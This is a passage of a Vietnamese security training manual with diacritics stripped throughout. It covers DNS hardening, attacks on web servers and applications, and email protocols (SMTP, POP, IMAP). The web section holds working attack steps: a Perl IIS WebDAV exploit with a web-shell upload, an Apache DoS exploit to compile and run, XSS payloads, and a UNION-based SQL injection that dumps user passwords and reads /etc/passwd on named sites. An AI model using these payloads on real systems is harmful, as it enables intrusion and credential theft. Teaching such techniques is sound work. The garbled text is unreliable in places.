Nhiu my ch DNS cho php cp nht ng. Tnh nng cp nht ng gip nhng my ch DNS ny ng k tn my ch DNS v a ch IP cho nhng my ch DHCP cha a ch IP. DDNS c th l mt cng c h tr qun tr hiu qu trong khi cu hnh th cng nhng mu ti nguyn DNS cho nhng my ch ny.

Tuy nhin, vic khng kim tra nhng bn cp nht DDNS c th gy ra mt vn v bo mt. Ngi dng xu c th cu hnh my ch cp nht ng nhng ti nguyn trn my ch DNS Page | 166 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

(nh my ch d liu, my ch web hay my ch c s d liu) v nh hng kt ni ti my ch ch sang PC ca h.

Bn c th gim nguy c gp phi nhng bn cp nhp DNS c hai bng cch yu cu bo mt kt ni ti my ch DNS cp nht ng. iu ny c th d dng thc hin bng cch ci t my ch DNS s dng nhng vng tng hp Active Directory v yu cu bo mt cp nht ng. Tt c min thnh vin c th cp nht ng thng tin DNS mt cch bo mt sau khi thc hin ci t. g. Ngng chy Zone Transfer

Zone Transfer (vng chuyn i) nm gia my ch DNS chnh v my ch DNS ph. Nhng my ch DNS chnh c phn quyn cho nhng min c th cha vng file DNS c th ghi v cp nht khi cn thit. My ch DNS ph nhn mt bn sao ch c ca nhng vng file ny t my ch DNS chnh. My ch DNS ph c s dng tng kh nng thc thi truy vn DNS trong mt t chc hay trn Internet.

Tuy nhin, Zone Transfer khng gii hn my ch DNS ph. Bt c ai cng c th chy mt truy vn DNS cu hnh my ch DNS cho php Zone Transfer kt xut ton b vng file c s d liu. Ngi dng xu c th s dng thng tin ny thm d gin tn trong cng ty v tn cng dch v cu trc h tng ch cht. Bn c th ngn chn iu ny bng cch cu hnh my ch DNS t chi Zone Transfer thc hin yu cu, hay cu hnh my ch DNS cho php Zone Transfer ch t chi yu cu ca mt s my ch nht nh. h. S dng Firewall kim sot truy cp DNS

Firewall c th c s dng chim quyn kim sot i vi nhng ngi dng kt ni my ch DNS. Vi nhng my ch DNS ch s dng cho nhng truy vn t my trm ni b, admin cn phi cu hnh firewall chn kt ni t nhng my ch ngoi vo nhng my ch DNS ny. Vi nhng my ch DNS c s dng nh Forwarder lu tr, firewall cn c cu hnh ch cho php nhn nhng truy vn DNS t my ch DNS c s dng nh Forwarder lu tr. Mt ci t firewall policy rt quan trng l chn nhng ngi dng ni b s dng giao tip DNS kt ni vo nhng my ch DNS ngoi.

i. Ci t kim sot truy cp vo Registry ca DNS

Page | 167 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Trn nhng my ch DNS nn tng Windows, kim sot truy cp cn c cu hnh trong nhng ci t Registry lin quan ti my ch DNS cho php nhng ti khon c yu cu truy cp c v thay i ci t ca Registry.

Key DNS trong HKLM\CurrentControlSet\Services cn c cu hnh ch cho php Admin v ti khon h thng truy cp, ngoi ra nhng ti khon ny cn c cp quyn Full Control.

j. Ci t kim sot truy cp vo file h thng DNS

Trn nhng my ch DNS nn tng Windows, bn nn cu hnh kim sot truy cp trn file h thng lin quan ti my ch DNS v vy ch nhng ti khon yu cu truy cp vo chng c cho php c hay thay i nhng file ny.

Th mc %system_directory%\DNS v nhng th mc con cn c ci t ch cho php ti khon h thng truy cp vo, v ti khon h thng cn c cp quyn Full Control. 2. Bo mt cho ng dng Web a. Gii thiu Thng thng Hacking 1 Web Server, Hacker thng phi xem th Web Server ang chy h iu hnh g v chy nhng sercice g trn , h iu hnh thng thng l cc h iu hnh Win 2000 Server, Win 2003 Server, Redhat.v.v. Cc Service bao gm Apache, IIS, FTP Server v.v. Nu nh 1 trong nhng Service ca H iu hnh b li hay service khc b li c th dn ti vic mt quyn kim sot ca h thng. Trong bi thc hnh ca phn ny, tc gi gii thiu li ca h iu hnh l DCOM v li ng dng khc l Server -U, Apache(FTP Server). T nhng li ny, ta c th kim sot hon ton my nn nhn. b. Cc l hng trn dch v Web L hng trn lp h iu hnh L hng trn Web Services L hng trn vWeb Application

Page | 168 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

c. Khai thc l hng bo mt tng h iu hnh v bo mt cho my ch Web L hng trn h iu hnh vWindows hay Linux ch yu xy ra trn cc dch v truy cho php truy cp t xa (RPC, SSH, Telnet) Di y l report t chng trnh Nessus Scan h iu hnh

Khi c l hng bo mt mc high tr ln h thng hon ton c th b tn cng:

Page | 169 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Attack thnh cng khai thc l hng bo mt MS08-067 ca Microsoft

Page | 170 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Bo mt my ch vWeb layer OS Thc hin cc bc bo mt cho h iu hnh phn trn ca ti liu ny c mt h iu hnh an ton d. Khai thc l hng trn Web Service S dng Active Perl + Code khai thc file.pl + Shell download cc nhiu trn mng khai thc l hng IIS WebDAV Bc 1: Ci t Active Perl Bc 2: Copy file tocbatdat.pl (file attack) Bc 3: Upload Shell rhtools.asp

Page | 171 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Bc 4: Truy cp vo my ch qua Shell

bo mt li ny cn phi s dng phin bn vWeb Service an ton.

Page | 172 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

e. Khai thc l hng DoS trn Apache 2.0.x -2.0.64 v 2.2.x 2.2.19 L hng ny kh nhiu my tnh trn Internet vn cn li, khi h thng c li ny cho php hacker dng mt cu lnh c th lm treo dch v web. V hin nay cha c bn v li cho l hng ny: Bc 1: Download code t site: http://www.exploit-db.com/exploits/18221/ Bc 2: i file ny thnh file.c c tn l rcvalle-rapache.c Bc 3: Bin dch file.c ny thnh file chy vi cu lnh trong linux
gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c

Bc 4: chy file ny
Linux# ./rcvalle-rapache IP

f . Khai thc l hng trn Web Application ng dng Web thng thng s dng d liu u vo trong cc truy cp HTTP (hoc trong cc tp tin) nhm xc nh kt qu phn hi. Tin tc c th sa i bt k phn no ca mt truy xut HTTP, bao gm URL, querystring, headers, cookies, form fields, v thm ch field n (hidden fields), nhm vt qua cc c ch bo mt. Cc tn cng ph bin dng ny bao gm: Ch y lnh h thng ty chn Cross site scripting Li trn b m Tn cng Format string SQL injection Cookie poisoning Sa i field n Trong bi thc hnh ny, ta th khai thc cc l hng Cross Site Cripting, Format string, Cookie Manipulation, Authorization Failure. Cross Site Scripting u tin ta login vo bng username jv v password jv789 v chn chc nng post message. Sau ta post script vo phn message text. Sau ta submit post script ny ln. Ta s dng F5 Refresh li trnh duyt v thy xut hin. Page | 173 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Lc ny trnh duyt ca nn nhn v tnh thc hin script c user post ln Server. Da vo script ny, tin tc c th n cp cookie ca nn nhn v log in vo h thng. Cc cu lnh kim tra XSS: "><script>alert('hey')</script> http://ha.ckers.org/xss.html All Cheat Code XSS "><script>exec(%systemroot%\system32\cmd.exe)</script> "><script>while(1){alert('hey')}</script> Vo han "><script>alert(document.cookie)</script> LeapLastLogin=20090523152133; PHPSESSID=28026127959bf076767f3adac1c736d5 Gii thiu v SQL Injection: y l K thut tn cng ny li dng nhng l hng trn ng dng(khng kim tra k nhng k t nhp t ngi dng). Thc hin bng cch thm cc m vo cc cu lnh hay cu truy vn SQL (thng qua nhng textbox) trc khi chuyn cho ng dng web x l, Server. T hc hin v tr v cho trnh duyt (kt qu cu truy vn hay nhng thng bo li) nh m cc tin tc c th thu thp d liu, chy lnh (trong 1 s trng hp) v sau cho c th chim c quyn kim sot ca h thng. Sau y l 1 s th thut cn bn. VD Khai thc l hng SQL Injection ca MySQL v PHP http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1 Kim tra li trn website Kim tra xem c bao nhiu trng: 1 order by 30 Kim tra trng li: 1 and 1=0 union select 1 and 1=0 union 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 Pht hin ra trng li l 4 thc hin bc tip theo:

select

Exploit Page | 174 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Bc 1: Show table 1 and 1=0 union select 1,database(),3,group_concat(unhex(hex(table_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29 from information_schema.tables-- &catid=20 Bc 2: Show Column group_concat(unhex(hex(column_name))) http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select

1,database(),3,group_concat(unhex(hex(column_name))),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29 from information_schema.columns where table_name=char(106, 111, 115, 95, 117, 115, 101, 114, 115)-- &catid=20 Bc 3: Get Database; http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,group_concat(username,0x2f,password,0x2f,email,userType),5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from jos_users-- &catid=20 Bc 4: Doc file he thong http://www.tocbatdat.edu.vn/index.php?lg=1 and 1=0 union select 1,database(),3,load_file(char(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &catid=20 http://tocbatdat.edu.vn/?show=news&ic=3&list=8_148&lg=1%20and%201=0%20union%20select %201,2,3,4,group_concat%28TenDN,0x2f,MatKhau%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22%20from%20maxcare_tbadmin-3. An ton dch v Mail Server a. Gii thiu tng quan v SMTP, POP, IMAP a.1 Kin trc v hot ng ca th in t Mun gi th in t ngi gi cn phi c mt account trn mt my ch th. Mt my ch c th c mt hoc nhiu account. Mi account u c mang mt tn khc nhau (user). Mi Page | 175 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

account u c mt hp th ring (mailbox) cho account . Thng thng th tn ca hp th s ging nh tn ca account. Ngoi ra my vi tnh phi c ni trc tip hoc gin tip vi h thng Internet nu mun gi nhn th in t ton cu. Ngi s dng my vi tnh ti nh vn c th gi nhn th in t bng cch kt ni my vi tnh ca h vi mt my vi tnh khc bng modem. C mt s ni cp pht account th in t min ph cho cc my vi tnh ti nh c th dng modem kt ni vi my vi tnh chuyn nhn th in t nh hotmail.com hoc yahoo.com .v.v. Ngoi ra, cn c rt nhiu c quan thng mi cung cp dch v hoc account cho my vi tnh ti nh nhng ngi s dng phi tr tin dch v hng thng. ng i ca th Th in t chuyn t my my ch th in t ny (mail server) ti my ch t in t khc trn internet. Khi th c chuyn n ch th n c cha ti hp th in t ti my ch th in t cho n khi n c nhn bi ngi nhn. Ton b qu trnh x l ch xy ra trong vi pht, do n cho php nhanh chng lin lc vi mi ngi trn ton th gii mt cnh nhanh chng ti bt c thi im no d ngy hay m. Gi, nhn v chuyn th nhn c th in t bn cn phi c mt ti khon (account) th in t. Ngha l bn phi c mt a ch nhn th. Mt trong nhng thun li hn vi th thng thng l bn c th nhn th in t t bt c u. Bn ch cn kt ni vo Server th in t ly th v my tnh ca mnh. gi c th bn cn phi c mt kt ni vo internet v truy nhp vo my ch th in t chuyn th i. Th tc tiu chun c s dng gi th l SMTP (Simple Mail Transfer Protocol). N c kt hp vi th tc POP (Post Office Protocol) v IMAP ly th. M hnh ca h thng my ch th in t:

Page | 176 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Vi mt h thng my ch th in t cung cp cho mt n v va v nh th ton b h thng thng c tch hp vo mt my ch. V my ch va lm chc nng nhn, gi th, lu tr hp th v kim sot th vo ra. - S dng th tc SMTP chuyn, nhn th gia cc my ch th vi nhau. - S dng th tc SMTP cho php mail client gi th ln my ch. - S dng th tc POP hoc IMAP n mail client nhn th v. a.2 Gii thiu v giao thc SMTP Gii thiu Mc tiu ca SMTP l chuyn truyn email tin cy v hiu qu. SMTP khng ph thuc h thng con v ch yu cu 1 knh truyn d liu ng tin cy. Mt tnh nng quan trng ca SMTP ca n l kh nng relay(chuyn tip) mail qua mi trng dch v truyn thng. Mt dch v truyn thng cung cp mt mi trng truyn thng gia cc tin trnh (IPCE). Mt IPCE c th bao gm mt mng, mt s mng, hay mt h thng mng con. C th hiu IPCE l mi trng cho php mt tin trnh c th giao tip qua li trc tip vi mt tin trnh khc. iu quan trng l cc IPCE khng ch c quan h 1-1 trn cc mng. Mt tin trnh c th giao tip trc tip vi nhiu tin trnh khc thng qua IPCE. Mail l mt ng dng ca truyn thng lin tin trnh. Mail c th c truyn ti gia cc tin trnh trn nhiu IPCEs khc nhau 1 tin trnh c kt ni gia hai (hay nhiu) IPCE. C th hn, email c th c chuyn tip (relay) qua nhiu Host trn cc h thng chuyn ti khc nhau qua cc Host trung gian. M hnh SMTP Cc SMTP c thit k da trn cc m hnh truyn thng sau: - Khi c cc yu cu mail t ngi s dng, pha SMTP-send s thit lp mt knh truyn hai chiu ti pha SMTP-receiver - SMTP-receiver y c th l ch n cui cng hay ch l mt a ch trung gian. - SMTP-send gi SMTP commands n SMTP-receiver. - SMTP-receiver p ng SMTP commands bng cch gi tr cho SMTP send cc SMPT replies tng ng Mt khi knh truyn c thit lp, SMTP-sender s gi mt MAIL command cho bit ngi gi. Nu SMTP-receiver chp nhn mail n s p ng 1 OK reply. Sau SMTPsender li gi mt RCPT command cho bit l ngi s nhn mail, nu SMTP-receiver chp nhn mail ny cho ngi nhn th n reply li l OK, nu khng n s reply li l mail ny b loi b. Nu SMTP-receiver reply l OK th SMTP-sender s gi d liu mail ti pha nhn v kt thc bng mt command c bit no . Nu SMTP-receiver x l thnh cng d liu mail ny th n s reply li l OK. Page | 177 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

- SMTP cung cp nhiu k thut cch khc nhau gi mail: o Truyn thng khi host pha gi v host pha nhn c kt ni ti cng mt dch v truyn ti. oThng qua cc my ch SMTP khi host pha gi v host pha nhn khng c kt ni ti cng mt dch v truyn ti.i s cho mail command l 1 tuyn ngc (reverse-path), trong ghi r mail c gi t ai. i s cho RCPT command l mt tuyn chuyn tip (forward-path), ch ra mail c gi cho ai. Tuyn chuyn tip l 1tuyn ngun, trong khi cc tuyn ngc l 1 tuyn quay tr (c th c dng tr li mt thng bo cho ngi gi khi mt li xy ra vi mt message chuyn tip). Khi cng mt message c gi n nhiu ngi nhn, SMTP khuyn khch vic truyn ti ch c mt bn sao ca cc d liu cho tt c cc ngi nhn ti cng mt my ch ch. Cc mail command v reply c mt c php cng nhc. Cc reply cng c 1 m s. Trong phn sau y, m xut hin cc v d thc t s dng cc mail command v reply, cc danh sch y cc command v reply. Cc command v reply khng phi l trng hp nhy cm. Tc l, mt t command hoc reply c th l ch thng, hoa, hay hn hp. Lu rng iu ny l khng ng vi tn ngi s dng hp th. V i vi mt s my tn ngi s dng l trng hp nhy cm, v cc trin khai SMTP phi a trng hp ny ra bo v cc trng hp tn ngi dng ging vi cc tham s trong mailbox. Tn my ch khng phi l trng hp nhy cm. Cc command v reply l gm cc k t ASCII. Khi dch v chuyn th cung cp 1 knh truyn 1 byte 8bit (octet), mi k t 7 bit c a vo cc bit thp ca octet, bit cao ca octet xa v 0. Khi c th ha cc dng chung ca mi lnh v reply, 1 i s s c biu din bng 1 bin(hay 1 hng) trong ngn ng meta , chng hn, <string> hoc <reverse-path> Khi xc nh cc hnh thc chung ca mt lnh hoc tr li, mt i s. y cc du < cho bit y l bin trong ngn ng meta. Page | 178 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

MIME v SMTP MIME (Multipurpose Internet Mail Extensions) cung cp thm kh nng cho SMTP v cho php cc file c dng m ho multimedia i km vi bc in SMTP chun. MIME s dng bng m Base64 chuyn cc file dng phc tp sang m ASCII chuyn i. MIME l mt tiu chun m i nh n hin c h tr b i hu h t cc ng dn g, v bn ph i thay i n u chng trnh th in t c a b n khng c h tr MIME. MIME c quy chun trong cc tiu chun RFC 2045-2049. S/MIME L mt chun m i c a MIME cho php h tr cho cc bc in c m ho. S/MIME da trn k thut m cng cng RSA v gip cho bc in khng b xem trm hoc chn l y.ho Lnh ca SMTP Mt cch n gin SMTP s dng cc cu lnh ngn iu khin bc in. Bng d i l danh sch cc lnh c a SMTP. Cc lnh c a SMTP c xc nh trong tiu chun RFC 821.

HELO MAIL RCPT DATA RSET VRFY NOOP QUIT SEND

Hello. S dng xc nh ngi gi in. Lnh ny ny i km vi tn ca host gi in. Trong ESTMP (extended protocol), th lnh ny s l EHLO. Kh i to m t giao d ch gi th. N kt hp "from" xc nh ngi gi th. Xc nh ng i nh n th . Thng bo bt u ni dung thc s ca bc in (phn thn ca th). D liu c m thnh dng m 128-bit ASCII v n c kt thc vi mt dng n cha du Hu b giao d ch th chm (.). S dng xc th c ngi nhn th. N l lnh "no operation" xc nh khng thc hin hnh ng g Thot kh i tin trnh kt thc Cho host nhn bit rng th cn phi gi n u cui khc.

SMTP m r ng (Extend ed SMTP) SMTP th c ci thit ngy cng p ng nhu cu cao c a ngi dng v l m t th tc ngy cng c ch. Nh d sao cng cn c s m rng tiu chu n SMTP v chun RFC 1869 ra i b xung cho SMTP. N khng ch m rng m cn cung cp thm cc tnh nng cn thit cho cc lnh c sn. V d: lnh SIZE l lnh m rng cho php nhn gii hn ln c a bc in n. Khng c ESMTP th s khng gii hn c Page | 179 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

ln ca b c th Khi h thng kt ni vi m t MTA, n s s dng khi to th ESMTP thay HELO bng EHLO. Nu MTA c h tr SMTP m rng (ESMTP) th n s tr li vi mt danh sch cc lnh m n s h tr. Nu khng n s tr l i vi m lnh sai (500 Command not recognized) v host gi s quay tr v s dng SMTP. Sau y l mt tin trnh ESMTP: 220 esmtpdomain.com Server ESMTP Sendmail 8.8.8+Sun/8.8.8; Thu, 22 Jul 1999 09:43:01 EHLO host.sendingdomain.com 250-mail.esmtpdomain.com Hello host, pleased to meet you 250-EXPN 250-VERB 250-8BITMIME 250-SIZE 250-DSN 250-ONEX 250-ETRN 250-XUSR 250 HELP QUIT 221 Goodbye host.sendingdomain.com

SMTP Headers C th l y c rt nhiu thng tin c ch bng cch kim tra phn header ca th. Khng ch xem c bc in t u n, ch ca th, ngy gi v nh ng n g i nhn. Bn cn c th xem c nhng im m bc in i qua trc khi n c hp th c a b n. Tiu chun RFC 822 qu y nh header cha nhng g. Ti thiu c n gi gi (from), ngy gi v ng i nhn (TO, CC, hoc BCC)

Page | 180 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Header ca th khi nhn c cho php bn xem bc in i qua nh ng u tr c khi n hp th ca bn. N l mt dng c rt t t kim tra v gii quy t li. Sau y l v d : From someone@mydomain.COM Sat Jul 31 11:33:00 1999 Received: from host1.mydomain.com by host2.mydomain.com (8.8.8+Sun/8.8.8) with ESMTP id LAA21968 for ; Sat, 31 Jul 1999 11:33:00 -0400 (EDT) Received: by host1.mydomain.com with Interne Mail Service (5.0.1460.8) id ; Sat, 31 Jul 1999 11:34:39 -0400 Message-ID: From: "Your Friend" To: "'jamisonn@host2.mydomain.com'" Subject: Hello There Date: Sat, 31 Jul 1999 11:34:36 -0400 Trn v d trn c th thy bc in c gi i t someone@m ydomain.com. T mydomain.com, n c chuyn n host1. Bc in c gi t host2 ti host1 v chuyn ti ngi dng. Mi ch b c in d ng li th host nhn c yu cu in thm thng tin vo header n bao gm ngy gi tm dng . Host2 thng bo rngn nhn c in lc11:33:00. Host1 thng bo rng n nh n c bc in vo lc 11:34:36, S trn lch h n mt pht c kh nng l do s khng ng b gia ng h ca hai n i. Thu n li v b t li ca SMTP Nh th tc X.400, SMTP c mt s thun l i v bt l i Thun li bao g m: SMTP rt ph bin. N c h tr bi nhiu t chc. SMTP c gi thnh qun tr v duy tr thp. SMTP n c cu trc a ch n gin. Bt li bao gm: SMTP thiu mt s chc nng SMTP thit kh nng bo m t nh X.400. Page | 181 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

N ch gii h n vo nhng tnh n ng n gin nh t a.3 Gii thiu v giao thc POP IMAP v

Trong nhng ngy thng u tin ca th in t, ngi dng c yu cu truy nhp v my ch th in t v c cc bc in ca h . Cc chng trnh th thng s dng dng text v thiu kh nng thn thin vi ngi dng. gii quyt vn mt s th t c c pht trin cho php ngi dng c th l y th v my c a h hoc c cc giao din s dng thn thin hn vi ng i dng. V chnh iu em n s ph bin ca th in t.C hai th tc c s dng ph bin nht hin ny l POP (Post Office Protocol)v IMAP (Internet Mail Access Protocol). Post Office Protocol (POP)POP cho php ngi dng c account ti my ch th in t kt ni vo MTA v l y th v my tnh ca mnh, c th c v tr l i li. POP c pht tri n u tin l vo nm 1984 v c nng cp t bn POP2 ln POP3 vo nm 1988. V hin nay hu ht ngi dng s d ng tiu chun POP3 POP3 kt ni trn nn TCP/IP n my ch th in t (s dng cng 110). Ng i dng in username v password. Sau khi xc thc u client s s dng cc lnh ca POP3 l y hoc xo th. POP3 ch l th tc l y th trn my ch th in t. POP3 c quy nh b i tiu chu n RFC 1939. Lnh ca POP3 Lnh USER PASS STAT Miu t Xc nh username Xc nh password Yu cu v trng thi ca hp th nh s

lng th v ln ca th LIST Hin danh sch ca th RETR Nhn th DELE Xo mt bc th xc nh NOOP Khng lm g c

Page | 182 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

RSET QUIT

Khi phc li nh th xo (rollback) Th c hin vic thay i v thot ra

Internet Mail Access Protocol (IMAP) Th tc POP3 l m t th tc rt c ch v s dng rt n gin l y th v cho ngi dng. Nh s n gin cng em n vic thiu mt s cng dng cn thit. V d: POP3 ch l vic vi ch offline c ngha l th c l y v s b xo trn server. IMAP th h tr nhng thiu st ca POP3. IMAP c pht trin vo nm 1986 bi trng i hc Stanford. IMAP2 pht trin vo nm 1987. IMAP4, l bn m i nh t ang c s dng v n c cc t ch c tiu chun Internet ch p nhn vo nm 1994. IMAP4 c quy nh b i tiu chun RFC 2060 v n s dng cn g 143 ca TCP. Lnh ca IMAP4 L nh CAPABILITY Miu t Yu cu danh sch cc chc nng h tr

AUTHENTICA Xc nh s dn g xc thc t m t server khc cp username v password TE Cung LOGIN SELECT EXAMINE CREATE DELETE Lnh Chn hp th in hp th ch c php c To hp th Xo hp th Miu t

RENAME

i tn hp th

SUBSCRIBE

Thm vo mt list ang hot ng

UNSUBSCRIBE Di kh i list ang ho t ng LIST Danh sch hp th

Page | 183 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Hin danh sch ng i s dng hp th STATUS Trng thi ca h th (s lng th ,...) APPEND Thm message vo hp th CHECK Yu cu kim tra hp th LSUB CLOSE EXPUNGE SEARCH nh FETCH STORE Tm kim trong n i dung c a message Thay i ni dng ca messages COPY Th c hin xo v thot kh i hp th Th c hin xo Tm kim trong hp th tm messages xc

Copy message sang hp th khc NOOP LOGOUT Khng lm g ng kt ni

So snh POP3 v IMAP4 C rt nhiu im khc nhau gia POP3 v IMAP4. Ph thuc vo ngi dng, MTA, v s cn thit , C th s dng POP3, IMAP4 hoc c hai. Li ch ca POP3 l : Rt n gin. c h tr rt rng Bi rt n gin nn, POP3 c rt nhiu gii hn. V d n ch h tr s dng mt hp th v th s c xo khi my ch th in t khi l y v. IMAP4 c nhng li ch khc: H tr xc thc rt mnh Page | 184 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

H tr s d ng nhiu hp th c bit h tr cho cc ch vic lm vic online, offline, hoc khng kt n i IMAP4 ch online th h tr cho vic ly tp hp cc th t my ch , tm kim v l y message cn tm v ...IMAP4 cng cho php ngi dng chuyn th t th mc ny ca my ch sang th mc khc hoc xo th . IMAP4 h tr rt tt cho ngi dng hay phi di chuyn v phi s dng cc my tnh khc nhau. b. Cc nguy c b tn cng khi s dng Email b.1 S thiu bo mt trong h thng email Webmail: n u kt n i ti Webmail Server l khng an ton (v d a ch l http:// vkhng phi l https://), lc mi thng tin bao gm Username v pasword khng c m ha khi n t Webmail Server ti my tnh. SMTP: SMTP khng m ha thng ip. M i kt ni gia SMTP servers gi thng ip ca bn d i d ng ch cho mi k nghe trm th y. Thm vo , nu email server yu cu bn gi username v password login vo SMTP server mc ch chuyn thng ip ti mt server khc, khi tt c u c gi di d ng ch, mc tiu nghe trm. Cu i cng, thng ip gi bng SMTP bao gm thng tin v m y tnh m chng c gi i, v chng trnh email c s dng. Nhng thng tin ny sn sng cho mi ngi nhn, c th mang tnh cht c nhn. POP v IMAP: Giao thc POP v IMAP yu cu bn gi username v password login, u khng c m ha. V v y, thng ip c a b n c th c c bi bt k k no ang nghe ln thng tin ca my tnh cng nh nh cung cp d ch v email ca bn. Backups: thng ip c lu tr trn SMTP server di dng ch , khng c m ha.Vic Sao lu d liu trn server c th c thc hin bt c lc no v ngi qun tr c th c bt k d liu no trn my tnh. b.2 Cc nguy c trong qu trnh gi email Eavesdropping: Internet l ni rng ln vi rt nhiu ngi. Tht d dng ai truy cp vo my tnh hoc on mng m thng tin ca bn ang c truyn trn , bt thng tin v c. Ging nh ai ang phng k bn ang lng nghe cuc ni chuyn in thoi ca bn, hacker c th s dng cc cng c man-in-the-middle bt ton b cc gi tin t ngi s dng email. Vic ny c th c thc hin mt cch d dng thng qua cc chng trnh nh Cain&Abel, Ettercap...

Page | 185 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

Khc phc Eavesdropping: - Do trnh tnh trng eavesdropping xy ra, chng ta nn m ha cc thng tin khi chng c chuyn i trn mng internet n server Mail. V ngay trn server, thng tin cng cn phi c m ha lu tr 1 cch an ton s dng kha bo mt m ch c ngi nhn ch thc mi bit. Identify Theft: Nu ai c th thu thp username v password m bn dng truy cp vo email server, h c th c mail ca bn v gi mail nh bn. Thng thng, nhng thng tin ny c th thu thp bi k nghe ln trn SMTP, POP, IMAP hoc kt ni WebMail, bng cch c thng ip m bn nh km theo cc thng tin ny. Khc phc Identify Theft: - c th khc phc identity theft, chng ta cn phi to ra c 1 s trao i ring t, b mt v an ton bng cch gi nhng thng tin c nhn v ni dung tin nhn di dng m ha khi chng di chuyn trn internet. VD: MyMail s dng cc ng link giao tip Secure Socket Protocol gim tnh trng indentify Theft xy ra. Invasion of Privacy: Nu bn rt quan tm n thng tin ring t ca mnh, bn cn xem xt kh nng vic sao lu ca bn khng c bo v . Bn c th cng quan tm n vic nhng ngi khc c kh nng bit c a ch IP ca my tnh bn. Thng tin ny c th c dng nhn ra thnh ph bn ang sng hoc thm ch trong trng hp no c th tm ra a ch ca bn. Vic ny khng xy ra vi WebMail, POP, IMAP, nhng i vi SMTP th li c kh nng xy ra. Khc phc invasion of Privacy: - Tt c cc thng tin s c bo mt bng cch m ha bng kha b mt ri lu tr, c th c c mail, ngi nhn cn phi nh chnh xc username v password ca mnh. Page | 186 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

- Du a ch IP trong phn header message, iu ny s gip bo v nhng thng tin c nhn nh a ch thnh ph, tiu bang m bn ang sng. - M ha tt c ni dung email lu tr v cng m ha khi cn truyn. Message Modification: Bt c ngi no c quyn admin trn bt k server SMTP no m thng ip ca bn n, th khng ch c th c thng ip ca bn, m h cn c th xa hay thay i thng ip trc khi n tip tc i n ch. Ngi nhn ca bn s khng th bit thng ip ca bn c b thay i hay khng? Nu thng ip b xa i mt th h cng khng th bit rng c thng ip c gi cho h. Khc phc Message Modification: - Khi email c gi n server mail th n cn lu tr di dng m ha bng 1 kha bo mt ring, khi d cho ai c quyn admin trn server, h vn khng th thay i c ni dung email. - Thm na chng ta cng phi ngn chn khng cho System administrator c quyn truy sut ti khan email bng cch n gin reset v to ra 1 password mi. 4. Bo mt truy cp t xa Phn ny trnh by trong mc 2 ca ti liu v Network Infrastructure Security. 5. L hng bo mt Buffer overflow v cch phng chng a. L thuyt Trong cc lnh vc an ninh my tnh v lp trnh, mt li trn b nh m hay gi tt l li trn b m l mt li lp trnh c th gy ra mt ngoi l truy nhp b nh my tnh v chng trnh b kt thc, hoc khi ngi dng c ph hoi, h c th li dng li ny ph v an ninh h thng. Li trn b m l mt iu kin bt thng khi mt tin trnh lu d liu vt ra ngoi bin ca mt b nh m c chiu di c nh. Kt qu l d liu s ln cc v tr b nh lin k . D liu b ghi c th bao gm cc b nh m khc, cc bin v d liu iu khin lung chy ca chng trnh (program flow control). Cc li trn b m c th lm cho mt tin trnh v hoc cho ra cc kt qu sai. Cc li ny c th c kch hot bi cc d liu vo c thit k c bit thc thi cc on m ph hoi hoc lm cho chng trnh hot ng mt cch khng nh mong i. Bng cch , cc li trn b m gy ra nhiu l hng bo mt (vulnerability) i vi phn mm v to

Page | 187 Copyright by Tocbatdat

[TL: o to v An ton thng tin cho ABC

6, 2012

